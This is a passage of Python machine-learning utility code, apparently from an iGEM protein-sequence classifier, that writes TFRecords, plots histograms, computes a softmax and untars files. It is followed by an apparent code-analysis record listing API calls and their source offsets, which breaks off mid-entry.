assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength),\
"%s" % str(seq_tensor.shape)
assert label.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
}))
self.writer.write(example.SerializeToString())
else:
# print("validseq")
try:
oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv)
except IndexError: # catches error from csv_decoder -> reopen the file:
in_csv.close()
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv)
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength)
assert oh_labels.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = oh_labels.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
}))
self.writer.write(example.SerializeToString())
self.writer.close()
def produce_train_valid(self):
"""Highlevel wrapper for the example_to_TF_records function."""
assert self.mode.startswith('one_hot'), "mode must be 'one_hot_padded'"
self.example_to_TFrecords(is_train=True, garbage_percentage=0, structure=False)
self.example_to_TFrecords(is_train=False, garbage_percentage=0, structure=False)
def plot_histogram(log_file, save_dir):
"""Simple plotting function to plot a hist from a specified file containing counts per labels.
Args:
        log_file: A `str` path to the file containing the histogram data.
        save_dir: A `str` directory into which the resulting plot is saved.
    """
count_dict = {}
with open(log_file, "r") as in_fobj:
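        # each line holds whitespace-separated predicted labels; tally how often each label appears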
for line in in_fobj:
pred_labels = line.strip().split()
for label in pred_labels:
                try:
                    count_dict[label] += 1
                except KeyError:
                    # first time this label is seen
                    count_dict[label] = 1
bars = [count_dict[label] for label in count_dict.keys()]
labels = [label for label in count_dict.keys()]
set_style("whitegrid")
fig, ax = plt.subplots()
ax = barplot(x=bars, y=labels)
    fig.savefig(os.path.join(save_dir, 'negative_test.png'))
def _add_var_summary(var, name, collection=None):
"""Attaches a lot of summaries to a given tensor.
Args:
var: A `Tensor`, for which to calculate the summaries.
name: `str`, the name of the Tensor.
collection: `str` the collection to which to add the summary. Defaults to None.
"""
with tf.name_scope(name):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean, collections=collection)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev, collections=collection)
tf.summary.scalar('max', tf.reduce_max(var), collections=collection)
tf.summary.scalar('min', tf.reduce_min(var), collections=collection)
tf.summary.histogram('histogram', var, collections=collection)
def _variable_on_cpu(name, shape, initializer, trainable):
"""Helper function to get a variable stored on cpu.
Args:
name: A `str` holding the name of the variable.
shape: An `Array` defining the shape of the Variable. For example: [2,1,3].
initializer: The `tf.Initializer` to use to initialize the variable.
        trainable: A `bool` stating whether the variable is trainable or not.
Returns:
A `tf.Variable` on CPU.
"""
with tf.device('/cpu:0'): #TODO will this work?
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype, trainable=trainable)
#dtf.add_to_collection('CPU', var)
return var
def softmax(X, theta = 1.0, axis = None):
"""Compute the softmax of each element along an axis of X.
Args:
X: `ND-Array`, Probably should be floats.
theta: float parameter, used as a multiplier
prior to exponentiation. Default = 1.0 (optional).
axis: axis to compute values along. Default is the
first non-singleton axis (optional).
Returns:
An `Array` of same shape as X. The result will sum to 1 along the specified axis.
"""
# make X at least 2d
y = np.atleast_2d(X)
# find axis
if axis is None:
axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)
# multiply y against the theta parameter,
y = y * float(theta)
# subtract the max for numerical stability
y = y - np.expand_dims(np.max(y, axis = axis), axis)
# exponentiate y
y = np.exp(y)
# take the sum along the specified axis
ax_sum = np.expand_dims(np.sum(y, axis = axis), axis)
# finally: divide elementwise
p = y / ax_sum
# flatten if X was 1D
if len(X.shape) == 1: p = p.flatten()
return p
def untar(file):
"""Untar a file in the current wd.
Args:
file: A str specifying the filepath
"""
try:
        tar = tarfile.open(file)
tar.extractall()
tar.close()
except:
print('ERROR: File is not a .tar.gz, or does not exist.')
| [
"tarfile.open",
"tensorflow.get_variable",
"matplotlib.pyplot.ylabel",
"tensorflow.train.Int64List",
"seaborn.set_style",
"tensorflow.reduce_mean",
"tensorflow.cast",
"numpy.atleast_2d",
"numpy.greater",
"numpy.mean",
"tensorflow.random_normal",
"os.path.exists",
"numpy.multiply",
"numpy.reshape",
"tensorflow.reduce_min",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.asarray",
"numpy.max",
"numpy.exp",
"matplotlib.pyplot.close",
"numpy.stack",
"os.mkdir",
"numpy.concatenate",
"tensorflow.python_io.TFRecordWriter",
"tensorflow.train.FloatList",
"matplotlib.pyplot.ylim",
"numpy.maximum",
"tensorflow.summary.scalar",
"tensorflow.square",
"random.randint",
"tensorflow.stack",
"tensorflow.device",
"collections.OrderedDict",
"matplotlib.pyplot.savefig",
"numpy.amin",
"numpy.ones",
"numpy.float32",
"matplotlib.use",
"matplotlib.pyplot.ioff",
"tensorflow.train.BytesList",
"tensorflow.reduce_max",
"tensorflow.summary.histogram",
"matplotlib.pyplot.title",
"matplotlib.pyplot.xlim",
"numpy.transpose",
"re.sub",
"matplotlib.pyplot.legend",
"math.ceil",
"os.makedirs",
"sklearn.preprocessing.OneHotEncoder",
"matplotlib.font_manager.FontProperties",
"os.path.join",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.pad",
"numpy.ndarray",
"numpy.expand_dims",
"tensorflow.name_scope",
"numpy.random.randint",
"tensorflow.constant",
"seaborn.barplot",
"os.path.basename",
"numpy.amax",
"matplotlib.pyplot.subplots",
"json.dump"
] | [((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((67773, 67795), 'seaborn.set_style', 'set_style', (['"""whitegrid"""'], {}), "('whitegrid')\n", (67782, 67795), False, 'from seaborn import barplot, set_style\n'), ((67810, 67824), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (67822, 67824), True, 'import matplotlib.pyplot as plt\n'), ((67834, 67859), 'seaborn.barplot', 'barplot', ([], {'x': 'bars', 'y': 'labels'}), '(x=bars, y=labels)\n', (67841, 67859), False, 'from seaborn import barplot, set_style\n'), ((70053, 70069), 'numpy.atleast_2d', 'np.atleast_2d', (['X'], {}), '(X)\n', (70066, 70069), True, 'import numpy as np\n'), ((70377, 70386), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (70383, 70386), True, 'import numpy as np\n'), ((7012, 7061), 'os.path.join', 'os.path.join', (['self._opts._summariesdir', '"""metrics"""'], {}), "(self._opts._summariesdir, 'metrics')\n", (7024, 7061), False, 'import re, os\n'), ((7329, 7359), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7337, 7359), True, 'import numpy as np\n'), ((7396, 7426), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7404, 7426), True, 'import numpy as np\n'), ((7460, 7490), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7468, 7490), True, 'import numpy as np\n'), ((8559, 8590), 'numpy.greater', 'np.greater', (['sigmoid_logits', '(0.5)'], {}), '(sigmoid_logits, 0.5)\n', (8569, 8590), True, 'import numpy as np\n'), ((8688, 8726), 'numpy.sum', 'np.sum', (['batch_predicted_labels'], {'axis': '(0)'}), '(batch_predicted_labels, axis=0)\n', (8694, 8726), True, 'import numpy as np\n'), ((8801, 8828), 'numpy.sum', 'np.sum', (['true_labels'], {'axis': '(0)'}), '(true_labels, axis=0)\n', (8807, 8828), True, 'import numpy as np\n'), ((10045, 10083), 'numpy.concatenate', 'np.concatenate', (['self.roc_score'], {'axis': '(0)'}), '(self.roc_score, axis=0)\n', (10059, 10083), True, 'import numpy as np\n'), ((10110, 10149), 'numpy.concatenate', 'np.concatenate', (['self.roc_labels'], {'axis': '(0)'}), '(self.roc_labels, axis=0)\n', (10124, 10149), True, 'import numpy as np\n'), ((10950, 10973), 'numpy.mean', 'np.mean', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (10957, 10973), True, 'import numpy as np\n'), ((11055, 11078), 'numpy.amax', 'np.amax', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11062, 11078), True, 'import numpy as np\n'), ((11159, 11182), 'numpy.amin', 'np.amin', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11166, 11182), True, 'import numpy as np\n'), ((13273, 13303), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13281, 13303), True, 'import numpy as np\n'), ((13340, 13370), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13348, 13370), True, 'import numpy as np\n'), ((14127, 14137), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (14135, 14137), True, 'import matplotlib.pyplot as plt\n'), ((14152, 14190), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {'figsize': '(5, 5)', 'dpi': '(200)'}), '(1, figsize=(5, 5), dpi=200)\n', (14162, 14190), True, 'import matplotlib.pyplot as plt\n'), ((14199, 14250), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'color': '"""#005493"""', 'lw': '(2)', 'label': 'legend'}), "(x, y, color='#005493', lw=2, label=legend)\n", (14207, 14250), True, 'import 
matplotlib.pyplot as plt\n'), ((14362, 14382), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0.0, 1.0]'], {}), '([0.0, 1.0])\n', (14370, 14382), True, 'import matplotlib.pyplot as plt\n'), ((14391, 14412), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (14399, 14412), True, 'import matplotlib.pyplot as plt\n'), ((14815, 14845), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.svg')"], {}), "(filename + '.svg')\n", (14826, 14845), True, 'import matplotlib.pyplot as plt\n'), ((14852, 14882), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.png')"], {}), "(filename + '.png')\n", (14863, 14882), True, 'import matplotlib.pyplot as plt\n'), ((14889, 14903), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (14898, 14903), True, 'import matplotlib.pyplot as plt\n'), ((17611, 17624), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17622, 17624), False, 'from collections import OrderedDict\n'), ((17652, 17665), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17663, 17665), False, 'from collections import OrderedDict\n'), ((17727, 17740), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17738, 17740), False, 'from collections import OrderedDict\n'), ((18597, 18655), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (18610, 18655), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((30565, 30615), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 10)'], {}), '(175, self._opts._windowlength - 10)\n', (30579, 30615), False, 'import random\n'), ((31748, 31780), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (31756, 31780), True, 'import numpy as np\n'), ((31797, 31826), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (31811, 31826), True, 'import numpy as np\n'), ((31851, 31866), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (31861, 31866), True, 'import numpy as np\n'), ((31891, 31928), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (31905, 31928), True, 'import numpy as np\n'), ((32166, 32239), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (32172, 32239), True, 'import numpy as np\n'), ((32261, 32292), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (32273, 32292), True, 'import numpy as np\n'), ((33038, 33139), 'tensorflow.random_normal', 'tf.random_normal', (['[self._opts._batchsize, self._opts._embeddingdim, self._opts._windowlength, 1]'], {}), '([self._opts._batchsize, self._opts._embeddingdim, self.\n _opts._windowlength, 1])\n', (33054, 33139), True, 'import tensorflow as tf\n'), ((33376, 33397), 'tensorflow.stack', 'tf.stack', (['index_batch'], {}), '(index_batch)\n', (33384, 33397), True, 'import tensorflow as tf\n'), ((34314, 34352), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize, 2]'], {}), '([self._opts._batchsize, 2])\n', (34324, 34352), True, 'import numpy as np\n'), ((34371, 34406), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize]'], {}), '([self._opts._batchsize])\n', (34381, 34406), True, 'import numpy as np\n'), ((35866, 35895), 'numpy.stack', 'np.stack', 
(['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (35874, 35895), True, 'import numpy as np\n'), ((37789, 37820), 'numpy.stack', 'np.stack', (['labels_tensor'], {'axis': '(0)'}), '(labels_tensor, axis=0)\n', (37797, 37820), True, 'import numpy as np\n'), ((37875, 37904), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (37883, 37904), True, 'import numpy as np\n'), ((37921, 37951), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (37935, 37951), True, 'import numpy as np\n'), ((41384, 41413), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (41392, 41413), True, 'import numpy as np\n'), ((41430, 41460), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (41444, 41460), True, 'import numpy as np\n'), ((42903, 42961), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (42916, 42961), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((54337, 54367), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (54345, 54367), True, 'import numpy as np\n'), ((54466, 54499), 'numpy.expand_dims', 'np.expand_dims', (['oh_labels'], {'axis': '(0)'}), '(oh_labels, axis=0)\n', (54480, 54499), True, 'import numpy as np\n'), ((55582, 55631), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 1)'], {}), '(175, self._opts._windowlength - 1)\n', (55596, 55631), False, 'import random\n'), ((56747, 56779), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (56755, 56779), True, 'import numpy as np\n'), ((56796, 56825), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (56810, 56825), True, 'import numpy as np\n'), ((56850, 56865), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (56860, 56865), True, 'import numpy as np\n'), ((56890, 56927), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (56904, 56927), True, 'import numpy as np\n'), ((57165, 57238), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (57171, 57238), True, 'import numpy as np\n'), ((57260, 57291), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (57272, 57291), True, 'import numpy as np\n'), ((67873, 67916), 'os.path.join', 'os.path.join', (['save_dir', '"""negative_test.png"""'], {}), "(save_dir, 'negative_test.png')\n", (67885, 67916), False, 'import re, os\n'), ((68242, 68261), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (68255, 68261), True, 'import tensorflow as tf\n'), ((69309, 69328), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (69318, 69328), True, 'import tensorflow as tf\n'), ((69393, 69484), 'tensorflow.get_variable', 'tf.get_variable', (['name', 'shape'], {'initializer': 'initializer', 'dtype': 'dtype', 'trainable': 'trainable'}), '(name, shape, initializer=initializer, dtype=dtype,\n trainable=trainable)\n', (69408, 69484), True, 'import tensorflow as tf\n'), ((70459, 70479), 'numpy.sum', 'np.sum', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70465, 70479), True, 'import numpy as np\n'), 
((70764, 70783), 'tarfile.open', 'tarfile.open', (['fname'], {}), '(fname)\n', (70776, 70783), False, 'import tarfile\n'), ((5562, 5596), 'os.path.exists', 'os.path.exists', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5576, 5596), False, 'import re, os\n'), ((5610, 5641), 'os.makedirs', 'os.makedirs', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5621, 5641), False, 'import re, os\n'), ((5657, 5689), 'os.path.exists', 'os.path.exists', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5671, 5689), False, 'import re, os\n'), ((5703, 5732), 'os.makedirs', 'os.makedirs', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5714, 5732), False, 'import re, os\n'), ((5935, 5970), 'json.dump', 'json.dump', (['self.config', 'config_dict'], {}), '(self.config, config_dict)\n', (5944, 5970), False, 'import json\n'), ((7077, 7110), 'os.path.exists', 'os.path.exists', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7091, 7110), False, 'import re, os\n'), ((7124, 7151), 'os.mkdir', 'os.mkdir', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7132, 7151), False, 'import re, os\n'), ((7185, 7231), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (7197, 7231), False, 'import re, os\n'), ((7705, 7814), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff')\n", (7732, 7814), False, 'from matplotlib import font_manager\n'), ((7857, 7968), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf')\n", (7884, 7968), False, 'from matplotlib import font_manager\n'), ((8948, 8996), 'numpy.multiply', 'np.multiply', (['batch_predicted_labels', 'true_labels'], {}), '(batch_predicted_labels, true_labels)\n', (8959, 8996), True, 'import numpy as np\n'), ((9855, 9901), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (9867, 9901), False, 'import re, os\n'), ((11604, 11642), 'numpy.maximum', 'np.maximum', (['(1)', 'self.pred_positives_sum'], {}), '(1, self.pred_positives_sum)\n', (11614, 11642), True, 'import numpy as np\n'), ((11750, 11790), 'numpy.maximum', 'np.maximum', (['(1)', 'self.actual_positives_sum'], {}), '(1, self.actual_positives_sum)\n', (11760, 11790), True, 'import numpy as np\n'), ((11811, 11841), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11817, 11841), True, 'import numpy as np\n'), ((11844, 11875), 'numpy.sum', 'np.sum', (['self.pred_positives_sum'], {}), '(self.pred_positives_sum)\n', (11850, 11875), True, 'import numpy as np\n'), ((11893, 11923), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11899, 11923), True, 'import numpy as np\n'), ((11926, 11959), 'numpy.sum', 'np.sum', (['self.actual_positives_sum'], {}), '(self.actual_positives_sum)\n', (11932, 11959), True, 'import numpy as np\n'), ((14290, 14353), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 1]', '[0, 1]'], {'color': '"""#B9B9B9"""', 'lw': '(2)', 'linestyle': '"""--"""'}), "([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle='--')\n", (14298, 14353), True, 'import matplotlib.pyplot as 
plt\n'), ((14448, 14490), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontproperties': 'self.font'}), '(title, fontproperties=self.font)\n', (14457, 14490), True, 'import matplotlib.pyplot as plt\n'), ((14503, 14546), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {'fontproperties': 'self.font'}), '(xname, fontproperties=self.font)\n', (14513, 14546), True, 'import matplotlib.pyplot as plt\n'), ((14559, 14602), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {'fontproperties': 'self.font'}), '(yname, fontproperties=self.font)\n', (14569, 14602), True, 'import matplotlib.pyplot as plt\n'), ((14615, 14660), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""', 'prop': 'self.font'}), "(loc='lower right', prop=self.font)\n", (14625, 14660), True, 'import matplotlib.pyplot as plt\n'), ((14687, 14703), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (14696, 14703), True, 'import matplotlib.pyplot as plt\n'), ((14716, 14733), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {}), '(xname)\n', (14726, 14733), True, 'import matplotlib.pyplot as plt\n'), ((14746, 14763), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {}), '(yname)\n', (14756, 14763), True, 'import matplotlib.pyplot as plt\n'), ((14776, 14805), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""'}), "(loc='lower right')\n", (14786, 14805), True, 'import matplotlib.pyplot as plt\n'), ((18928, 18983), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (18941, 18983), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((26190, 26263), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (26196, 26263), True, 'import numpy as np\n'), ((26296, 26327), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (26308, 26327), True, 'import numpy as np\n'), ((30453, 30473), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (30467, 30473), False, 'import random\n'), ((30855, 30875), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (30869, 30875), False, 'import random\n'), ((31251, 31276), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (31260, 31276), False, 'import math\n'), ((33204, 33246), 'numpy.random.randint', 'np.random.randint', (['(1)', 'self._opts._nclasses'], {}), '(1, self._opts._nclasses)\n', (33221, 33246), True, 'import numpy as np\n'), ((33308, 33326), 'tensorflow.constant', 'tf.constant', (['label'], {}), '(label)\n', (33319, 33326), True, 'import tensorflow as tf\n'), ((44040, 44095), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (44053, 44095), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((49630, 49703), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (49636, 49703), True, 'import numpy as np\n'), ((49736, 49767), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (49748, 49767), True, 'import numpy as np\n'), ((51381, 51402), 'numpy.ones', 'np.ones', 
(['[seq_length]'], {}), '([seq_length])\n', (51388, 51402), True, 'import numpy as np\n'), ((51539, 51580), 're.sub', 're.sub', (['"""[\'\\\\[\\\\]\\\\(]"""', '""""""', 'structure_str'], {}), '("[\'\\\\[\\\\]\\\\(]", \'\', structure_str)\n', (51545, 51580), False, 'import re, os\n'), ((52087, 52156), 'numpy.pad', 'np.pad', (['structure'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(structure, pad_width=npad, mode='constant', constant_values=0)\n", (52093, 52156), True, 'import numpy as np\n'), ((52288, 52324), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (52296, 52324), True, 'import numpy as np\n'), ((55502, 55522), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (55516, 55522), False, 'import random\n'), ((55854, 55874), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (55868, 55874), False, 'import random\n'), ((56250, 56275), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (56259, 56275), False, 'import math\n'), ((59449, 59487), 'tensorflow.python_io.TFRecordWriter', 'tf.python_io.TFRecordWriter', (['file_path'], {}), '(file_path)\n', (59476, 59487), True, 'import tensorflow as tf\n'), ((68276, 68302), 'tensorflow.name_scope', 'tf.name_scope', (['"""summaries"""'], {}), "('summaries')\n", (68289, 68302), True, 'import tensorflow as tf\n'), ((68323, 68342), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['var'], {}), '(var)\n', (68337, 68342), True, 'import tensorflow as tf\n'), ((68355, 68410), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""mean"""', 'mean'], {'collections': 'collection'}), "('mean', mean, collections=collection)\n", (68372, 68410), True, 'import tensorflow as tf\n'), ((68537, 68596), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""stddev"""', 'stddev'], {'collections': 'collection'}), "('stddev', stddev, collections=collection)\n", (68554, 68596), True, 'import tensorflow as tf\n'), ((68771, 68833), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""histogram"""', 'var'], {'collections': 'collection'}), "('histogram', var, collections=collection)\n", (68791, 68833), True, 'import tensorflow as tf\n'), ((70318, 70338), 'numpy.max', 'np.max', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70324, 70338), True, 'import numpy as np\n'), ((5848, 5900), 'os.path.join', 'os.path.join', (['self._summariesdir', '"""config_dict.JSON"""'], {}), "(self._summariesdir, 'config_dict.JSON')\n", (5860, 5900), False, 'import re, os\n'), ((10399, 10430), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10409, 10430), True, 'import numpy as np\n'), ((10499, 10529), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10509, 10529), True, 'import numpy as np\n'), ((10685, 10716), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10695, 10716), True, 'import numpy as np\n'), ((10732, 10762), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10742, 10762), True, 'import numpy as np\n'), ((12546, 12636), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + '.roc_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.roc_%d' % self.\n num_calculations)\n", (12558, 12636), False, 'import re, os\n'), ((12949, 13045), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + 
'.precision_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.precision_%d' % self.\n num_calculations)\n", (12961, 13045), False, 'import re, os\n'), ((25533, 25591), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (25543, 25591), True, 'import numpy as np\n'), ((31990, 32014), 'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (32000, 32014), True, 'import numpy as np\n'), ((33449, 33480), 'tensorflow.cast', 'tf.cast', (['label_tensor', 'tf.int32'], {}), '(label_tensor, tf.int32)\n', (33456, 33480), True, 'import tensorflow as tf\n'), ((37722, 37735), 'numpy.float32', 'np.float32', (['l'], {}), '(l)\n', (37732, 37735), True, 'import numpy as np\n'), ((39928, 39986), 'math.ceil', 'math.ceil', (['(self._opts._batchsize * self.garbage_percentage)'], {}), '(self._opts._batchsize * self.garbage_percentage)\n', (39937, 39986), False, 'import math\n'), ((48936, 48994), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (48946, 48994), True, 'import numpy as np\n'), ((56989, 57013), 